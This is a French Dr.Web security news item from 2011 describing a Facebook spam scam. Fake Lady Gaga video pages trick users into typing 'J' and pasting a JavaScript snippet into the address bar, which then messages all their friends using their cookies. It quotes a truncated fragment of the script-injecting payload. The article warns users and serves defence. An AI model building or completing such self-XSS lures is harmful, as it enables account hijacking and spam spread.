Protégez votre univers

Nos autres ressources

  • free.drweb.fr — utilitaires gratuits, plugins, widgets
  • av-desk.com — service Internet pour les prestataires de services Dr.Web AV-Desk
  • curenet.drweb.com — l'utilitaire de désinfection réseau Dr.Web CureNet!
Fermer

Bibliothèque
Ma bibliothèque

+ Ajouter à la bibliothèque

Contacter-nous !
Support 24/24 | Rules regarding submitting

Nous téléphoner

0 825 300 230

Forum

Vos requêtes

  • Toutes : -
  • Non clôturées : -
  • Dernière : le -

Nous téléphoner

0 825 300 230

Profil

Retour aux actualités

Les utilisateurs Facebook menacés par un script malveillant

Le 15 novembre 2011

Doctor Web détecte la propagation de spam dans Facebook. Tout utilisateur peut devenir un spammeur à son insu s’il agit selon les demandes des malfaiteurs.

L’utilisateur reçoit un message privé de la part d’une des personnes de sa liste d’amis. Ce message est créé automatiquement, et peut comporter trois variantes: «poor lady gaga lol.. nice videos :D», «check out lady gaga. haha!!» ou «omg did you see this lady gaga video?», il contient un lien vers une page Facebook (8 pages en tout). Cette page contient une image imitant une fenêtre YouTube, mais la vidéo ne démarre pas, l'utilisateur voit une notification disant que la vidéo peut être vue uniquement par une personne majeure ; en cliquant sur « Continue », l'utilisateur copie un scenario écrit en JavaScipt et l’image lui propose d’appuyer sur Ctrl+V (copier) dans la ligne d’adresse du navigateur, il est à noter que pour éviter le contrôle par un système de sécurité de l'ordinateur, l'utilisateur doit d'abord appuyer sur la lettre J sur son clavier, car le scenario JavaScript n'est pas complet : «avascript:(a=(b=document).createElement('script')).src=…», il manque la première lettre. En entrant la lettre J et en pressant Ctrl+V, l’utilisateur démarre le scénario JavaScript des malfaiteurs.

screenshot

Ce script entraîne l’envoi du même message à tous les amis de l’utilisateur, en profitant de ses cookies. Ensuite, l’utilisateur est dirigé vers une autre page, avec d’autres scénarios JavaScript (un des scenarios compte le nombre de visiteurs sur la page et l’autre est un site pirate également : cpalead.com), d’où il est dirigé vers YouTube pour voir la vidéo de jeunes déguisées en LadyGaga. Vu le nombre de personnes qui ont vu cette vidéo amateur, plus de 2 millions de téléchargements, nous pouvons supposer que l'objectif des malfaiteurs était que le plus de monde possible la regarde.

Doctor Web appelle les utilisateurs à rester vigilants et à ne surtout pas ouvrir des pages demandant d’introduire des codes suspects, même si le lien a été reçu par un ami.

Votre avis nous intéresse

Chaque commentaire = 1 Dr.Webonus ! Pour poser une question sur une news aux administrateurs du site, mettez @admin au début de votre commentaire. Si vous postez une question à l'attention de l'auteur d'un commentaire, mettez le symbole @.avant son nom.


Other comments

Editeur russe des solutions antivirus Dr.Web
Expérience dans le développement depuis 1992
Les internautes dans plus de 200 pays utilisent Dr.Web
L'antivirus est fourni en tant que service depuis 2007
Support 24/24

Dr.Web © Doctor Web
2003 — 2021

Doctor Web - éditeur russe des solutions antivirus Dr.Web. Doctor Web développe les produits Dr.Web depuis 1992.

333b, Avenue de Colmar, 67100 Strasbourg